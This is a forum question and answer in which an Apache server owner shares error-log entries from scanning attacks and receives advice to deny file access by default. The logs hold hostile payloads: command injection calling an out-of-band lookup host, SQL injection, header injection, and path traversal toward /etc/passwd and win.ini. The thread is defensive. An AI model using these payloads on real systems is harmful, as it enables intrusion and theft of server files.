Improving apache2 security

I have been analyzing my server logs for a week and I found bad intentioned requests, and I want to know if is possible to protect it, because I have no clue about what I should to, the only idea I got is creating an .htaccess rule to block certain words on server requests, like gethostbyname, but I dont know how neither if it works

[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')

[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'

[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca

[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1

[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1

[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1

[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1

Could you help me please?


Securing Apache is a large topic. See the section "The A" in this answer for some pointers.

Your last 3 log messages are attempts at path traversal, to read files outside of the web root on your host. Protect Server Files by Default in the Apache security docs recommends that you deny access to all files by default:

<Directory "/">
  Require all denied
</Directory>

then enable access to just the files you want. This is a best practice, that will protect you against path traversal attacks.